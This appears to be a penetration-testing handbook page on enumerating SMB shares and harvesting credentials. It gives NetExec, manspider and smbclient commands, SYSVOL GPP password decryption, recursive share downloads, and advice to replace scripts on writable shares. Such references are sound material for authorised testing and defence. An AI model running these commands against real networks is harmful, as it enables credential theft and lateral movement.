Handbook

Shares

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Prerequisites

  • Valid domain credentials or low privilege sufficient
  • Network access to target hosts

What to Look For

FindingValue
Credentials in scripts/config filesImmediate escalation
Deployment shares with install scriptsOften contain service account passwords
IT shares with GPO backupsMay contain credentials or password policies
Writable sharesFile drop / poisoning potential
SYSVOL and NETLOGONGPP passwords, logon scripts — always check
Backup sharesMay contain NTDS.dit or SAM backups

Enumerate Shares via NetExec

bash
nxc smb <target-ip> -u <username> -p <password> --shares

# Always check DC — SYSVOL, NETLOGON
nxc smb <dc-ip> -u <username> -p <password> --shares

# Sweep subnet
nxc smb <subnet>/24 -u <username> -p <password> --shares

# Hash instead of password
nxc smb <subnet>/24 -u <username> -H <hash> --shares

# Machine account
nxc smb <dc-ip> -u '<machine$>' -p '<password>' --shares

Spider Shares for Interesting Files

bash
# Results saved to /tmp/nxc_spider_plus/<target>/
nxc smb <target-ip> -u <username> -p <password> -M spider_plus

nxc smb <target-ip> -u <username> -p <password> -M spider_plus \
    -o EXCLUDE_EXTS=".dll,.exe,.msi,.msp,.msu"

nxc smb <target-ip> -u <username> -p <password> -M spider_plus \
    -o SHARE=<share-name>

nxc smb <subnet>/24 -u <username> -p <password> -M spider_plus
bash
manspider <target-ip> -f passw login logon cred secret \
    -d <domain.local> -u <username> -p <password>

# Search file contents
manspider <target-ip> -f passw \
    -d <domain.local> -u <username> -p <password> --content

# Specific file types
manspider <target-ip> \
    -d <domain.local> -u <username> -p <password> \
    -e xml ini txt config ps1 bat cmd

# Suppress no-match noise
manspider <target-ip> -f passw login logon \
    -d <domain.local> -u <username> -p <password> -n

Manual Share Access

bash
smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>'

smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>' -c 'ls'

# Download recursively
smbclient \\\\<target-ip>\\<share-name> -U '<domain>/<username>%<password>' \
    -c 'recurse ON; prompt OFF; mget *'

# SYSVOL / NETLOGON
smbclient \\\\<dc-ip>\\SYSVOL -U '<domain>/<username>%<password>'
smbclient \\\\<dc-ip>\\NETLOGON -U '<domain>/<username>%<password>'

SYSVOL - GPP Password Hunting

bash
# On a Domain connected Windows box
findstr /S /I cpassword \\<dc-ip>\sysvol\<domain>\policies\*.xml

nxc smb <dc-ip> -u <username> -p <password> -M gpp_password

gpp-decrypt <cpassword-value>

Mount Share on Linux

bash
sudo mkdir /mnt/share
sudo mount -t cifs //<target-ip>/<share-name> /mnt/share \
    -o username=<username>,password=<password>,domain=<domain.local>

ls -la /mnt/share
grep -ri "password" /mnt/share/ 2>/dev/null

sudo umount /mnt/share

What Each Result Tells You

FindingImplication
SYSVOL readableCheck for GPP passwords, logon scripts
Deployment/IT share accessibleLikely credentials in scripts/configs
Writable share foundDrop files, replace scripts
cpassword in GPP XMLDecrypt immediately — full plaintext recovery
Config files with credentialsPass the password across subnet via nxc
Backup share accessibleCheck for NTDS.dit, SAM, VSS backups
Scripts with hardcoded passwordsTest for lateral movement

Flag Reference

nxc spider_plus

FlagMeaning
-M spider_plusRecursively map share contents
-o SHARE=<name>Limit to specific share
-o EXCLUDE_EXTS=Extensions to skip

manspider

FlagMeaning
-f <patterns>Filename patterns to search
-e <extensions>File extensions to search within
-d <domain>Domain name
-u <user>Username
-p <password>Password
-nSuppress no-match files
--contentSearch file contents

Additional Tooling to try: